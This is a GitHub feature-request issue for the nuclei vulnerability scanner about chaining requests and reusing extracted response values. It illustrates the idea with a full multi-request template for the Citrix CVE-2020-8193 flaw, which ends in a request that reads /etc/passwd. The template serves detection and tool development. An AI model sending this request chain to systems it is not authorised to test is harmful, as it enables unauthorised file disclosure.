### ISSUE TITLE
Chaining multiple request with reuse support of response data  

### ISSUE THREAD

**Issue by bauthard** [projectdiscovery/nuclei#156]
with the release of v2, we have added support of workflow which allows conditional executions of multiple templates, now to expand this support and allowing users to run chained/multiple requests in a single template which is also possible now but each request runs independently and can not make use of it's to next request, so the aim of this issue to achieve followings. 

- [ ] Allow reusing response values from the previous request to the next requests within same template. 

How this can be done? 

Extractors, once https://github.com/projectdiscovery/nuclei/issues/150 https://github.com/projectdiscovery/nuclei/issues/151 is done, we can get any value from the response, in future we can add more `type` to extractors to make it easier but for now available `types` are sufficient.

And to allow reusing those extracted values, we need to come up with a way to assign those values to variables, once done, here are a few examples of use cases. 

## Use case:- 

As an example, I'm writing an extended version of https://github.com/projectdiscovery/nuclei-templates/pull/233

```yaml
id: CVE-2020-8193

info:
  name: Citrix unauthenticated LFI
  author: pdteam
  severity: high

  # Source:- https://github.com/jas502n/CVE-2020-8193
  # This template covers only the detection part, use the above exploit for the exploit confirmation.

requests:
  - raw:
      - |
        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Content-Type: application/xml
        X-NITRO-USER: xpyZxwy6
        X-NITRO-PASS: xWXHUJ56
        <appfwprofile><login></login></appfwprofile>

    extractors:
      - type: kval
        name: session-cookie
        kval:
          - "SESSID"
        part: header

        # This will extract the value of the cookie named SESSID from response header.


  - raw:
      - |
        GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
        Host: 10.20.24.248
        User-Agent: python-requests/2.24.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Cookie: SESSID={{session-cookie}}


  - raw:
      - |
        GET /menu/neo HTTP/1.1
        Host: 10.20.24.248
        User-Agent: python-requests/2.24.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Cookie: SESSID={{session-cookie}}; is_cisco_platform=0


  - raw:
      - |
         GET /menu/stc HTTP/1.1
         Host: 10.20.24.248
         User-Agent: python-requests/2.24.0
         Accept-Encoding: gzip, deflate
         Accept: */*
         Connection: close
         Cookie: SESSID={{session-cookie}}; is_cisco_platform=0; startupapp=neo

  - raw:
      - |
        POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
        Host: 10.20.24.248
        User-Agent: python-requests/2.24.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Type: application/xml
        X-NITRO-USER: oY39DXzQ
        X-NITRO-PASS: ZuU9Y9c1
        rand_key: 1450749159.1594406727843271
        Cookie: SESSID={{session-cookie}}; is_cisco_platform=0; startupapp=neo
        Content-Length: 31

        <clipermission></clipermission>

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
```

In the above example, we tagged a name to the extractor and reused it as a variable, same as extractor name `{{session-cookie}}` in the next request to make the multi-step chains work, this also ensures to keep the template simple to understand for non-dev users.
